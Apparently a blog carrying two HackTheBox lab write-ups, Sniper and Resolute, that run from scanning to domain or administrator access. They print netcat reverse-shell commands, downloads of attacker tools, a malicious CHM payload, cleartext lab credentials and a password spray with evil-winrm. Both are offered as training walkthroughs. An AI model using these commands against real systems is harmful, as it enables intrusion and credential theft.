htb-sniper-nl

As always 1st a nmap scan

root@kali:~/htb/sniper# nmap -A 10.10.10.151 -oN fullscan
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-27 05:00 EST
Nmap scan report for sniper.htb (10.10.10.151)
Host is up (0.091s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h01m34s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-01-27T18:02:27
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   92.15 ms 10.10.14.1
2   94.52 ms sniper.htb (10.10.10.151)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.82 seconds
root@kali:~/htb/sniper#
I see that only a few ports are open, including SMB and a web server. After some analysis of the SMB server, I find nothing of immediate importance, so I keep browsing the web pages.

At some point in the blog I see one that accepts a parameter, so I start playing with it. Because it can be vulnerable to injection, I start with local and external file injections. After some ups and downs I find that neither local nor external file recording works via HTTP, so I continue to look to see if anything else is possible. With this Burp research I find this link on RFI based on SMB.
GET /blog/?lang=\WINDOWS\system32\drivers\etc\hosts HTTP/1.1 
Host: 10.10.10.151 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Connection: close 
Upgrade-Insecure-Requests: 1

So I reconfigure my SMB server to have a share called "sniper" and see if I can replicate what is in the examples.

see also: https://www.puckiestyle.nl/create-a-public-samba-share/
on kali 1st run : systemctl start smbd


After some trial and error, I see my nickname popping up in the source code, indicating that the RFI over SMB has worked. So now it is time to get this webshell and call it through my SMB Server.

The db.php file contains a username and password, because they can be interesting. I note them for further use and decide it is time to try a decent shell.

powershell Invoke-Webrequest "http://10.10.10.78/nc.exe" -OutFile c:\puckiestyle\nc.exe
So first I use Powershell to transfer netcat. or even simpler with uploading wwwwolfshell

nc.exe 10.10.14.11 9001 -e cmd

Then i call nc.exe , and get a shell on sniper

root@kali:~/htb# rlwrap nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.151] 49684
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\puckiestyle>whoami
whoami
nt authority\iusr

C:\puckiestyle>
So I got the shell as iUSR There is only one other regular user in the box named Chris. Maybe the database password is the same as the user password, so I want to try using PowerShell to escalate my rights. After some searching on how to use the password with a PowerShell command, I came across a scriptand decided to adjust it to my needs.
root@kalivm:~/Sniper# cat getshell.ps1 
$username = 'SNIPER\Chris'
$password = '36mEAhz/B8xQ~2VM'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential -ArgumentList $username,$securePassword
New-PSSession -Credential $credential | Enter-PSSession

Again, I use PowerShell to transfer the file and then execute it.

powershell Invoke-WebRequest "http://10.10.14.11/getshell.ps1" -OutFile c:\puckiestyle\getshell.ps1
c:\puckiestyle>powershell
powershell
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\sedje> Invoke-WebRequest "http://10.10.12.78/getshell.ps1" -OutFile c:\sedje\getshell.ps1
Invoke-WebRequest "http://10.10.12.78/getshell.ps1" -OutFile c:\sedje\getshell.ps1
PS C:\sedje> ./getshell.ps1
./getshell.ps1
[localhost]: PS C:\Users\Chris\Documents> whoami
whoami
sniper\chris
[localhost]: PS C:\Users\Chris\Documents>dir c:\
dir c:\
[localhost]: PS C:\Users\Chris\Documents>
c:\>cmd /c icacls puckiestyle /c /t /grant everyone:F
cmd /c icacls puckiestyle /c /t /grant everyone:F
processed file: puckiestyle
processed file: puckiestyle\getshell.ps1
processed file: puckiestyle\Microsoft
processed file: puckiestyle\nc.exe
processed file: puckiestyle\Microsoft\Windows
processed file: puckiestyle\Microsoft\Windows\PowerShell
processed file: puckiestyle\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Successfully processed 7 files; Failed processing 0 files
c:\puckiestyle>powershell 
powershell 
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\puckiestyle>
[localhost]: PS C:\Users\Chris\Documents> C:\puckiestyle\nc.exe 10.10.14.11 9002 -e powershell
C:\puckiestyle\nc.exe 10.10.14.11 9002 -e powershell
root@kali:/opt/evil-winrm# rlwrap nc -nlvp 9002
listening on [any] 9002 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.151] 49711
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Chris\Documents> type ../Desktop/user.txt
type ../Desktop/user.txt
21f4d0f29fc4dd867500c1ad716cf56e
PS C:\Users\Chris\Documents>

Now I have a fully functional shell

it is also possible with WinRM

first upload and run plink.exe

C:\temp>.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.8 
^J.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.8 
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's rsa2 key fingerprint is:
ssh-rsa 2048 85:9c:65:7b:ec:db:65:ee:28:91:c7:2e:2f:e0:22:06
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
^Jlogin as: puck
^Jpuck@10.10.14.8's password: secretpassword
^J
Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1 (2019-01-03) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jan 27 03:34:27 2020 from 10.10.10.151
Could not chdir to home directory /home/puck: No such file or directory
$

and next

PrivEsc

I found this

PS C:\Users\Chris> dir Downloads
dir Downloads

Directory: C:\Users\Chris\Downloads

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/11/2019 8:36 AM 10462 instructions.chm
A complete HTML help file,  so this can be interesting. with netcat I transported this file to my windows box, and this was the content

After more enumeration on disk i found

PS C:\DocsC:\Docs> type note.txt
Hi Chris, Your php skillz suck. Contact yamitenshi so that he teaches you how to use it 
and after that fix the website as there are a lot of bugs on it. And I hope that you've
prepared the documentation for our new app. Drop it here when you're done with it.
Regards, Sniper CEO.
So apparently the file instructions.chm is what Chris should prepare for the CEO and then go to this folder.,

I 1st installed htmlexe.exe from https://www.microsoft.com/en-us/download/details.aspx?id=21138

and then used  Nishang : https://raw.githubusercontent.com/samratashok/nishang/master/Client/Out-CHM.ps1
C:\temp\Powershell -Version 2
PS C:\temp> Import-Module .\Out-CHM.ps1
PS C:\temp> out-chm -Payload "c:\temp\nc 10.10.14.8 5353 -e cmd" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Microsoft HTML Help Compiler 4.74.8702

Compiling c:\temp\doc.chm


Compile time: 0 minutes, 0 seconds
2 Topics
4 Local links
4 Internet links
0 Graphics


Created c:\temp\doc.chm, 13,428 bytes
Compression increased file by 271 bytes.
PS C:\temp> copy .\doc.chm c:\python37\project.chm
root@kali:~/htb/sniper# python3 -m http.server 82
Serving HTTP on 0.0.0.0 port 82 (http://0.0.0.0:82/) ...
10.10.10.151 - - [27/Jan/2020 03:58:26] "GET /project.chm HTTP/1.1" 200 -
PS C:\Docs> Invoke-WebRequest "http://10.10.14.8:82/project.chm" -Outfile c:\Docs\project.chm
Invoke-WebRequest "http://10.10.14.8:82/project.chm" -Outfile c:\Docs\project.chm

From the Sniper host I do an Invoke WebRequest again to download the CHM file to the desired folder while a netcat listener waits for the shell to execute

root@kali:~/Sniper# nc -nlvp 9005
Listening on 0.0.0.0 9005
Connection received on 10.10.10.151 53736   
Microsoft Windows [Version 10.0.17763.678]     
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
sniper\administrator
C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
5624caf363e2750e994f6be0b7436c15

Author : Puckiestyle

 

htb-resolute-nl

Like all windows based machines, I added IP 10.10.10.169 to my etc / hosts as resolute.htb and ran a port scan with nmap

NMAP  SCAN RESULTS

E:\PENTEST>nmap -T4 -A -v 10.10.10.169
Starting Nmap 7.70 ( https://nmap.org ) at 2020-07-10 09:15 W. Europe Summer Time
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:15
Completed NSE at 09:15, 0.00s elapsed
Initiating NSE at 09:15
Completed NSE at 09:15, 0.00s elapsed
Initiating Ping Scan at 09:15
Scanning 10.10.10.169 [4 ports]
Completed Ping Scan at 09:15, 2.59s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:16
Completed Parallel DNS resolution of 1 host. at 09:16, 0.00s elapsed
Initiating SYN Stealth Scan at 09:16
Scanning 10.10.10.169 [1000 ports]
Discovered open port 445/tcp on 10.10.10.169
Discovered open port 135/tcp on 10.10.10.169
Discovered open port 139/tcp on 10.10.10.169
Discovered open port 88/tcp on 10.10.10.169
Discovered open port 636/tcp on 10.10.10.169
Discovered open port 593/tcp on 10.10.10.169
Discovered open port 389/tcp on 10.10.10.169
Discovered open port 464/tcp on 10.10.10.169
Completed SYN Stealth Scan at 09:16, 1.31s elapsed (1000 total ports)
Initiating Service scan at 09:16
Scanning 8 services on 10.10.10.169
Completed Service scan at 09:16, 17.39s elapsed (8 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.169
Retrying OS detection (try #2) against 10.10.10.169
Retrying OS detection (try #3) against 10.10.10.169
Retrying OS detection (try #4) against 10.10.10.169
Retrying OS detection (try #5) against 10.10.10.169
Initiating Traceroute at 09:16
Completed Traceroute at 09:16, 0.15s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 09:16
Completed Parallel DNS resolution of 2 hosts. at 09:16, 6.51s elapsed
NSE: Script scanning 10.10.10.169.
Initiating NSE at 09:16
Completed NSE at 09:17, 26.25s elapsed
Initiating NSE at 09:17
Completed NSE at 09:17, 0.21s elapsed
Nmap scan report for 10.10.10.169
Host is up (0.18s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-07-10 07:29:38Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=7/10%OT=88%CT=1%CU=37112%PV=Y%DS=2%DC=T%G=Y%TM=5F0815F
OS:B%P=i686-pc-windows-windows)SEQ(SP=100%GCD=1%ISR=102%TI=I%CI=I%II=I%SS=S
OS:%TS=9)SEQ(SP=100%GCD=1%ISR=102%TI=RD%CI=RD%II=I%TS=A)OPS(O1=M54DNW8ST11%
OS:O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DST11
OS:)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W
OS:=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y
OS:%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR
OS:%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80
OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q
OS:=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h33m20s, deviation: 4h02m31s, median: 13m19s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2020-07-10T00:30:12-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-07-10 09:30:10
|_ start_date: 2020-07-10 09:29:14

TRACEROUTE (using port 1720/tcp)
HOP RTT ADDRESS
1 85.00 ms 10.10.14.1
2 144.00 ms 10.10.10.169

NSE: Script Post-scanning.
Initiating NSE at 09:17
Completed NSE at 09:17, 0.00s elapsed
Initiating NSE at 09:17
Completed NSE at 09:17, 0.00s elapsed
Read data files from: C:\Program Files (x86)\Nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.49 seconds
Raw packets sent: 1108 (52.474KB) | Rcvd: 1122 (48.618KB)

E:\PENTEST>

Next i used enum4linux

kali@kali:~/htb/resolute$ enum4linux 10.10.10.169
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jul 10 03:23:18 2020

==========================
| Target Information |
==========================
Target ........... 10.10.10.169
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


====================================================
| Enumerating Workgroup/Domain on 10.10.10.169 |
====================================================
[E] Can't find workgroup/domain


============================================
| Nbtstat Information for 10.10.10.169 |
============================================
Looking up status of 10.10.10.169
No reply from 10.10.10.169

=====================================
| Session Check on 10.10.10.169 |
=====================================
[+] Server 10.10.10.169 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:

===========================================
| Getting domain SID for 10.10.10.169 |
===========================================
Domain Name: MEGABANK
Domain Sid: S-1-5-21-1392959593-3013219662-3596683436
[+] Host is part of a domain (not a workgroup)

======================================
| OS information on 10.10.10.169 |
======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
[+] Got OS info for 10.10.10.169 from smbclient:
[+] Got OS info for 10.10.10.169 from srvinfo:
Unable to initialize messaging context
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

=============================
| Users on 10.10.10.169 |
=============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null)

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]

=========================================
| Share Enumeration on 10.10.10.169 |
=========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
directory_create_or_exist: mkdir failed on directory /run/samba/msg.lock: Permission denied
Unable to initialize messaging context

Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.10.169

====================================================
| Password Policy Information for 10.10.10.169 |
====================================================


[+] Attaching to 10.10.10.169 using a NULL share

[+] Trying protocol 139/SMB...

[!] Protocol failed: Cannot request session (Called Name:10.10.10.169)

[+] Trying protocol 445/SMB...

[+] Found domain(s):

[+] MEGABANK
[+] Builtin

[+] Password Info for Domain: MEGABANK

[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 7


==============================
| Groups on 10.10.10.169 |
==============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting builtin groups:
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]
group:[Server Operators] rid:[0x225]

[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.


[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]

[+] Getting local group memberships:
Group 'Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.

[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Contractors] rid:[0x44f]

[+] Getting domain group memberships:
Group 'Contractors' (RID: 1103) has member: MEGABANK\ryan
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\DefaultAccount
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\ryan
Group 'Domain Users' (RID: 513) has member: MEGABANK\marko
Group 'Domain Users' (RID: 513) has member: MEGABANK\sunita
Group 'Domain Users' (RID: 513) has member: MEGABANK\abigail
Group 'Domain Users' (RID: 513) has member: MEGABANK\marcus
Group 'Domain Users' (RID: 513) has member: MEGABANK\sally
Group 'Domain Users' (RID: 513) has member: MEGABANK\fred
Group 'Domain Users' (RID: 513) has member: MEGABANK\angela
Group 'Domain Users' (RID: 513) has member: MEGABANK\felicia
Group 'Domain Users' (RID: 513) has member: MEGABANK\gustavo
Group 'Domain Users' (RID: 513) has member: MEGABANK\ulf
Group 'Domain Users' (RID: 513) has member: MEGABANK\stevie
Group 'Domain Users' (RID: 513) has member: MEGABANK\claire
Group 'Domain Users' (RID: 513) has member: MEGABANK\paulo
Group 'Domain Users' (RID: 513) has member: MEGABANK\steve
Group 'Domain Users' (RID: 513) has member: MEGABANK\annette
Group 'Domain Users' (RID: 513) has member: MEGABANK\annika
Group 'Domain Users' (RID: 513) has member: MEGABANK\per
Group 'Domain Users' (RID: 513) has member: MEGABANK\claude
Group 'Domain Users' (RID: 513) has member: MEGABANK\melanie
Group 'Domain Users' (RID: 513) has member: MEGABANK\zach
Group 'Domain Users' (RID: 513) has member: MEGABANK\simon
Group 'Domain Users' (RID: 513) has member: MEGABANK\naoki
Group 'Domain Computers' (RID: 515) has member: MEGABANK\MS02$
Group 'Enterprise Admins' (RID: 519) has member: MEGABANK\Administrator
Group 'Domain Admins' (RID: 512) has member: MEGABANK\Administrator
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
Group 'Schema Admins' (RID: 518) has member: MEGABANK\Administrator
Group 'Domain Controllers' (RID: 516) has member: MEGABANK\RESOLUTE$

=======================================================================
| Users on 10.10.10.169 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.

=============================================
| Getting printer info for 10.10.10.169 |
=============================================
Unable to initialize messaging context
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Fri Jul 10 03:25:47 2020

kali@kali:~/htb$

I have the list of users and their roles and a clear text password of a user.

GETTING USER

Let us exploit SAMBA Service using RPCClient tool. Before that, let us gather some more information about the user Marko who’s password we have in clear text format in the Enum4Linux scan.

I tried to run EvilWinRM with the user Marko’s credentials, but it didn’t work. So, I guessed that Marko doesn’t have access to the system or his account is locked out. I decided to use the same password for the rest of the users, the password Welcome123!  worked for Melanie.

kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p Welcome123!

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents> cd ..
*Evil-WinRM* PS C:\Users\melanie> cd Desktop
*Evil-WinRM* PS C:\Users\melanie\Desktop> dir


Directory: C:\Users\melanie\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2019 7:33 AM 32 user.txt


*Evil-WinRM* PS C:\Users\melanie\Desktop> type user.txt
0c3[redacted]540
*Evil-WinRM* PS C:\Users\melanie\Desktop>

view for the hidden directories.

*Evil-WinRM* PS C:\> dir -force

I noticed the directory “PSTranscripts” and went on finding what is inside. The directory has a folder “20191203” inside, and there is a text file called “PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt”. The text file is a PowerShell transcript. I used Type to read the text file, here is the full transcript.

*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
